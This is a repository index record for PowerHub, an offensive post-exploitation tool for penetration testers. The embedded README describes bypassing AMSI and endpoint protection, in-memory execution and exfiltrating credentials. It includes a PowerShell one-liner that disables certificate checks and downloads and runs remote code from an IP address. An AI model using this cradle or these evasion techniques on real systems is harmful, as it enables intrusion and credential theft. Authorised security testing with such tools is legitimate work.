{"id":13539850,"url":"https://github.com/adrianvollmer/powerhub","last_synced_at":"2025-05-14T14:09:39.223Z","repository":{"id":34262243,"uuid":"142741112","full_name":"AdrianVollmer/PowerHub","owner":"AdrianVollmer","description":"A post exploitation tool based on a web application, focusing on bypassing endpoint protection and application whitelisting","archived":false,"fork":false,"pushed_at":"2025-04-04T14:41:25.000Z","size":7515,"stargazers_count":798,"open_issues_count":0,"forks_count":126,"subscribers_count":18,"default_branch":"master","last_synced_at":"2025-04-12T02:55:54.998Z","etag":null,"topics":["pentest","post-exploitation","powershell","python","remote-admin-tool"],"latest_commit_sha":null,"homepage":"https://adrianvollmer.github.io/PowerHub/","language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/AdrianVollmer.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2018-07-29T07:45:05.000Z","updated_at":"2025-04-10T08:13:12.000Z","dependencies_parsed_at":"2023-02-16T21:00:34.467Z","dependency_job_id":"49fdf240-5a59-43d4-bb81-be9785bba81a","html_url":"https://github.com/AdrianVollmer/PowerHub","commit_stats":{"total_commits":996,"total_committers":6,"mean_commits":166.0,"dds":0.09236947791164662,"last_synced_commit":"404f0f231c946c9c67fc0bc004669c47594d14b7"},"previous_names":[],"tags_count":34,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/AdrianVollmer%2FPowerHub","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/AdrianVollmer%2FPowerHub/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/AdrianVollmer%2FPowerHub/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/AdrianVollmer%2FPowerHub/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/AdrianVollmer","download_url":"https://codeload.github.com/AdrianVollmer/PowerHub/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":254160557,"owners_count":22024571,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["pentest","post-exploitation","powershell","python","remote-admin-tool"],"created_at":"2024-08-01T09:01:32.954Z","updated_at":"2025-05-14T14:09:34.210Z","avatar_url":"https://github.com/AdrianVollmer.png","language":"PowerShell","funding_links":[],"categories":["\u003ca id=\"1233584261c0cd5224b6e90a98cc9a94\"\u003e\u003c/a\u003e渗透\u0026\u0026offensive\u0026\u0026渗透框架\u0026\u0026后渗透框架","\u003ca id=\"3ed50213c2818f1455eff4e30372c542\"\u003e\u003c/a\u003e工具"],"sub_categories":["\u003ca id=\"a9494547a9359c60f09aea89f96a2c83\"\u003e\u003c/a\u003e后渗透","\u003ca id=\"12abc279c69d1fcf10692b9cb89bcdf7\"\u003e\u003c/a\u003e未分类-post-exp"],"readme":"PowerHub\n========\n\nPowerHub is a convenient post exploitation tool for PowerShell which aids a\npentester in transferring data, in particular code which may get flagged by\nendpoint protection. Features:\n\n* Fileless\n* Stateless\n* Cert pinning\n* String \"obfuscation\" by RC4 encryption\n* Choose your AMSI Bypass\n* Transparent aliases for in-memory execution of C# programs\n\n![PowerHub Webapp](docs/img/powerhub-webapp.png)\n![PowerHub Webapp](docs/img/powerhub-sharphound.png)\n\nDuring an engagement where you have a test client available, one of the\nfirst things you want to do is run SharpHound, Seatbelt, PowerUp,\nInvoke-PrivescCheck or PowerSploit. So you need to download the files,\nmess with endpoint protection, disable the execution policy, etc.\nPowerHub provides an (almost) one-click-solution for this. Oh, and you can\nalso run arbitrary binaries (PE and shell code) entirely in-memory using\nPowerSploit's modules, which is sometimes useful to bypass application\nwhitelisting.\n\nYour loot (Kerberos tickets, passwords, etc.) can be easily transferred back\neither as a file or a text snippet, via the command line or the web\ninterface. PowerHub also helps with collaboration in case you're a small\nteam.\n\nHere is a simple example (grab information about local groups with PowerView\nand transfer it back):\n\n```ps1con\nPS C:\\Users\\avollmer\u003e [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$Nxois='bZeVBC4vZfakT5SmCcaFam6IRY6UNLnC';$Plukgmio=New-Object Net.WebClient;IEX $Plukgmio.DownloadString('https://192.168.11.2:8443/')\n  _____   _____  _  _  _ _______  ______ _     _ _     _ ______\n |_____] |     | |  |  | |______ |_____/ |_____| |     | |_____]\n |       |_____| |__|__| |______ |    \\_ |     | |_____| |_____]\n2.0.0                       written by Adrian Vollmer, 2018-2024\nRun 'Help-PowerHub' for help\nPS C:\\Users\\avollmer\u003e Get-HubModule PowerView\n\nName   : /home/avollmer/.local/share/powerhub/modules/PowerSploit/Recon/PowerView.ps1\nType   : ps1\nN      : 205\nLoaded : True\nAlias  :\n\nPS C:\\Users\\avollmer\u003e Get-LocalGroup | PushTo-Hub -Name groups.json\n```\n\nDocumentation\n=============\n\nRead the docs [here](https://adrianvollmer.github.io/PowerHub/).\n\n* **Installation:** \u003chttps://adrianvollmer.github.io/PowerHub/latest/installation.html\u003e\n* **Usage:** \u003chttps://adrianvollmer.github.io/PowerHub/latest/usage.html\u003e\n* **Contributing:** \u003chttps://adrianvollmer.github.io/PowerHub/latest/contrib.html\u003e\n* **Changelog:** \u003chttps://adrianvollmer.github.io/PowerHub/latest/changelog.html\u003e\n\n\nCredits\n=======\n\nPowerHub is partially based on the awesome work of zc00l, @am0nsec, mar10,\np3nt4. And of course, it would be nothing without @harmj0y,\n@mattifestation and the many other contributors to\n[PowerSploit](https://github.com/PowerShellMafia/PowerSploit).\n\nThanks!\n\nAuthor and License\n==================\n\nAdrian Vollmer, 2018-2024. MIT License.\n\nDisclaimer\n==========\n\nUse at your own risk. Do not use without full consent of everyone involved.\nFor educational purposes only.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fadrianvollmer%2Fpowerhub","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fadrianvollmer%2Fpowerhub","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fadrianvollmer%2Fpowerhub/lists"}